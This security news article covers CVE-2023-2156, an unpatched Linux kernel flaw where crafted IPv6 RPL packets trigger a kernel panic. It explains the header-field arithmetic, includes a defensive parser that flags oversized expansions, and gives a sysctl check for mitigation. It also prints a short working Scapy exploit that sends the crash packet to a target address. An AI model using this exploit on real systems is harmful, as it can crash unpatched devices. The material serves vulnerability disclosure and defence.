Details have been disclosed about an unpatched (0-day) vulnerability (CVE-2023-2156) in the Linux kernel that makes it possible to halt a system by sending specially crafted IPv6 packets (packet-of-death). The problem manifests only when support for the RPL protocol (Routing Protocol for Low-Power and Lossy Networks) is enabled. RPL is disabled by default in distributions and is used mainly on embedded devices operating in wireless networks with high packet loss.
The vulnerability is caused by incorrect handling of external data in the RPL protocol parsing code, which triggers an assertion failure and puts the kernel into a panic state. When the data obtained from parsing the IPv6 RPL packet header is placed into the sk_buff (Socket Buffer) structure, if the CmprI field is set to 15, the Segleft field to 1 and CmprE to 0, the 48-byte address vector is decompressed to 528 bytes, and the memory allocated for the buffer turns out to be insufficient. In that case the skb_push function, which is used to place data into the structure, hits its check for a mismatch between the data size and the buffer size and generates a panic in order to prevent a write past the end of the buffer.
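The size arithmetic from the paragraph above, as an added example that is not part of the original article or the kernel's code: it parses an RPL source routing header with the RFC 6554 address-count formula and reproduces the 48-to-528-byte expansion. The `is_suspicious` heuristic, its `max_growth` threshold and the sample bytes are assumptions constructed for illustration.

```python
from dataclasses import dataclass

RPL_ROUTING_TYPE = 3      # Routing Type 3 = RPL Source Route Header
FULL_ADDR_LEN = 16        # bytes in an uncompressed IPv6 address


@dataclass
class RplSrh:
    segments_left: int
    cmpr_i: int
    cmpr_e: int
    pad: int
    packed_len: int       # bytes of compressed address data on the wire
    n_addresses: int
    expanded_len: int     # bytes once every address is restored to 16 octets


def parse_rpl_srh(hdr: bytes) -> RplSrh:
    """Parse a routing extension header starting at its Next Header octet."""
    if len(hdr) < 8:
        raise ValueError("truncated routing header")
    ext_len, rtype, segleft = hdr[1], hdr[2], hdr[3]
    if rtype != RPL_ROUTING_TYPE:
        raise ValueError("not an RPL source routing header")
    cmpr_i, cmpr_e, pad = hdr[4] >> 4, hdr[4] & 0x0F, hdr[5] >> 4
    packed = ext_len * 8
    if len(hdr) < 8 + packed:
        raise ValueError("header shorter than Hdr Ext Len claims")
    # RFC 6554: n = ((HdrExtLen*8 - Pad - (16 - CmprE)) / (16 - CmprI)) + 1
    body = packed - pad - (FULL_ADDR_LEN - cmpr_e)
    per_addr = FULL_ADDR_LEN - cmpr_i
    if body < 0 or body % per_addr:
        raise ValueError("address vector length inconsistent with CmprI/CmprE")
    n = body // per_addr + 1
    return RplSrh(segleft, cmpr_i, cmpr_e, pad, packed, n, n * FULL_ADDR_LEN)


def is_suspicious(srh: RplSrh, max_growth: int = 4) -> bool:
    """Hypothetical heuristic: expanded form far larger than the wire form."""
    return srh.segments_left > 0 and srh.expanded_len > max_growth * srh.packed_len


# Constructed sample using the field values quoted in the article
# (Hdr Ext Len=6 -> 48 bytes, Segleft=1, CmprI=15, CmprE=0), zero-filled addresses.
SAMPLE = bytes([59, 6, 3, 1, 0xF0, 0x00, 0, 0]) + bytes(48)
# Constructed benign header: two uncompressed addresses, no expansion.
BENIGN = bytes([59, 4, 3, 2, 0x00, 0x00, 0, 0]) + bytes(32)
```

With CmprI = 15 every single octet after the first 16 counts as one address, so 48 bytes on the wire describe 33 addresses and expand to 33 × 16 = 528 bytes.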
Exploit example:

```python
# We'll use Scapy to craft the packet
from scapy.all import *
import socket
import sys

# Use the IPv6 from your LAN interface
DST_ADDR = sys.argv[1]
SRC_ADDR = DST_ADDR

# We use sockets to send the packet
sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)

# Craft the packet
# Type = 3 makes this an RPL packet
# Addresses contains 3 addresses, but because CmprI is 15,
# each octet of the first two addresses is treated as a compressed address
# Segleft = 1 to trigger the amplification
# lastentry = 0xf0 sets CmprI to 15 and CmprE to 0
p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=["a8::", "a7::", "a6::"], segleft=1, lastentry=0xf0)

# Send this evil packet
sockfd.sendto(bytes(p), (DST_ADDR, 0))
```
Notably, the kernel developers were notified of the vulnerability back in January 2022 and over the following 15 months tried three times to fix the problem, releasing patches in September 2022, October 2022 and April 2023, but each time the fixes proved insufficient and the vulnerability could still be reproduced. In the end the ZDI project, which coordinated the work on fixing the vulnerability, decided to disclose detailed information about it without waiting for a working fix to appear in the kernel.
As a result, the vulnerability still remains unpatched. The patch included in kernel 6.4-rc2 is ineffective as well. Users are advised to verify that the RPL protocol is not in use on their systems, which can be done with the command sysctl -a | grep -i rpl_seg_enabled
Source: opennet.ru